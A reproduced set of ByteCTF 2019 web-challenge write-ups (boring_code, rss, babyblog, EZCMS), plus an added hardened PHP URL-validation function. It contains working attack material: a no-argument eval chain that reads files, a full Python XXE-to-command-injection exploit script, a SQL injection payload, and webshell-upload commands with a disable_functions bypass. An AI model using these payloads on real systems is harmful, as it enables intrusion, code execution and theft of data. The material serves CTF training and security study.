bytectf 2019 web challenge write-ups (reproduced)

boring_code

Environment

https://github.com/glzjin/bytectf_2019_boring_code

Solution

Visit http://127.0.0.1:8302/code/ and you get the source:

<?php
function is_valid_url($url) {
    if (filter_var($url, FILTER_VALIDATE_URL)) {
        if (preg_match('/data:\/\//i', $url)) {
            return false;
        }
        return true;
    }
    return false;
}

if (isset($_POST['url'])) {
    $url = $_POST['url'];
    if (is_valid_url($url)) {
        $r = parse_url($url);
        if (preg_match('/baidu\.com$/', $r['host'])) {
            $code = file_get_contents($url);
            if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
                if (preg_match('/et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
                    echo 'bye~';
                } else {
                    eval($code);
                }
            }
        } else {
            echo "error: host not allowed";
        }
    } else {
        echo "error: invalid url";
    }
} else {
    highlight_file(__FILE__);
}

For the first part (getting past the URL check), the write-ups from several teams I read all seem to have solved it by spending money on a suitable domain..
The interesting part is the second one: code execution using only functions called without arguments.
Reference: https://xz.aliyun.com/t/6316
In short, the problem is obtaining the strings you need using nothing but parameter-less function calls.
The most convenient chain I found gives the final payload:

echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))))));
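As an added example (my own code, not from the challenge or any write-up), here is a hardened version of is_valid_url() that closes the two weaknesses this challenge and the rss challenge below rely on: the host check is a bare suffix regex, so any host whose name merely ends in the characters baidu.com passes, and the scheme is only checked by a substring match for data://. The function names and the allow-list are assumptions of this example.

```php
<?php
// Hardened replacement for the challenge's is_valid_url() (added example, not the
// challenge's own code). Two fixes: an explicit scheme allow-list instead of a
// data:// substring check, and a host match that respects the dot boundary.

function is_allowed_host(string $host, array $allowed): bool {
    $host = strtolower(rtrim($host, '.'));
    foreach ($allowed as $a) {
        // exact match, or a real subdomain ("x.baidu.com"); never a bare
        // character suffix such as "asdfghjklbaidu.com"
        if ($host === $a || substr($host, -strlen('.' . $a)) === '.' . $a) {
            return true;
        }
    }
    return false;
}

function is_valid_url_hardened(string $url, array $allowed = ['baidu.com']): bool {
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // scheme allow-list: data://, php://, file:// etc. are rejected by construction
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    return is_allowed_host($parts['host'], $allowed);
}

// Constructed inputs mirroring the cases discussed in this write-up.
$cases = [
    'http://www.baidu.com/a.xml'              => true,
    'http://www.asdfghjklbaidu.com/a.xml'     => false, // passes the original regex
    'data://text.baidu.com/plain;base64,AAAA' => false, // scheme not on the allow-list
    'http://baidu.com.evil.example/x'         => false, // allowed name not at the end
];
foreach ($cases as $url => $expected) {
    $got = is_valid_url_hardened($url);
    printf("%-45s %s\n", $url, $got === $expected ? 'ok' : 'MISMATCH');
}
```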

rss

Environment

Not available yet

Solution

The service fetches and parses an RSS feed,
and data:// can be used to get past the baidu domain check.
Use XXE to read the challenge source.
In views/Admin.php we find:

usort($data, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));

Reference: https://www.cnblogs.com/-qing-/p/10816089.html
Exploit script:

# -*- coding: utf-8 -*-
import base64
import requests

# command to run on the target; the flag path is the one from the challenge
cmd = "cat+%2Fflag_eb8ba2eb07702e69963a7d6ab8669134"

# feed whose <description> expands an external entity; php://filter returns
# the fetched page base64-encoded so it survives the RSS rendering
xml = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://127.0.0.1/rss_in_order/?order=link%2C%24b-%3Elink%29%3B%7Dsystem%28%27""" + cmd + """%27%29%3B%2F%2F&rss_url=http://www.asdfghjklbaidu.com/a.xml" >]>
<rss version="2.0"
xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>xz</title>
<link>http://xz.aliyun.com/forum/</link>
<description>xz</description>
<atom:link href="http://xz.aliyun.com/forum/feed/" rel="self"></atom:link>
<language>zh-hans</language>
<lastBuildDate>Tue, 02 Jul 2019 06:03:00 +0800</lastBuildDate>
<item>
<title>123</title>
<link>http://xz.aliyun.com/t/5310</link>
<description>&xxe;</description>
<pubDate>Mon, 03 Jun 2019 09:09:00 +0800</pubDate>
<guid>http://xz.aliyun.com/t/5310</guid>
</item>
</channel>
</rss>"""

# the feed is delivered as a data:// URL whose "host" part ends in baidu.com
b64_xml = base64.b64encode(xml.encode('utf-8')).decode('ascii')
r = requests.post("http://112.126.96.50:9999/fetch",
                  data={"rss_url": "data://text.baidu.com/plain;base64," + b64_xml})
# print(r.text)
# the rendered <description> is the fourth <p> block of the response
b64_r = r.text.split('<p>')[3].split('</p>')[0].strip()
test = base64.b64decode(b64_r)
print(test.decode('utf-8', 'replace'))

babyblog

Environment

https://github.com/glzjin/bytectf_2019_babyblog

Solution

Fetch www.zip to get the source.
edit.php contains a second-order SQL injection:

if($_SESSION['id'] == $row['userid']){
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql->query("update article set title='$title',content='$content' where title='" . $row['title'] . "';");
    exit("<script>alert('Edited successfully.');location.href='index.php';</script>");
}

Payload

1'^(ascii(substr((select(group_concat(schema_name)) from (information_schema.schemata)),1,1))>1)^'1

Boolean-based injection; it stops once the title can no longer be modified.
Injection script: see https://xz.aliyun.com/t/6324
Extract the privileged account.
The original challenge should have had an account with isvip set to 1; the environment does not provide one, so modify it yourself.
With that privilege, replace.php becomes accessible:
$content = addslashes(preg_replace("/" . $_POST['find'] . "/", $_POST['replace'], $row['content']));
Since this is PHP 5.3, %00 truncation works, and preg_replace can then be leveraged for command execution:
https://xz.aliyun.com/t/2557
disable_functions is in effect, and when code is executed certain function names are blanked out.
First upload a webshell:

command = """eval("file_put_contents('1.php','PD9waHAgZXZhbCgkX1BPU1RbJ2FudCddKTs=');")"""
command = """eval("file_put_contents('2.php','<?php include(\\\'php://filter/convert.base64-decode/resource=1.php\\\');');")"""

After that, code can be executed through 2.php.
Reference:
https://github.com/l3m0n/Bypass_Disable_functions_Shell/tree/master/exp/LD_PRELOAD
Note that mail is filtered,
so replace the last line with
error_log("",1,"someone@example.com",""); to bypass it.

EZCMS

Environment

https://github.com/glzjin/bytectf_2019_ezcms

Solution

Get the source from www.zip.
Hash length extension attack.
Upload a phar file and combine it with deserialization to widen the attack surface.
Pick the ZipArchive class and use its open function to remove .htaccess.
See the references.

icloudmusic

Another web-pwn challenge; placeholder for now.

dot_server_prove

https://xz.aliyun.com/t/6312

References

https://xz.aliyun.com/t/6324
https://xz.aliyun.com/t/6305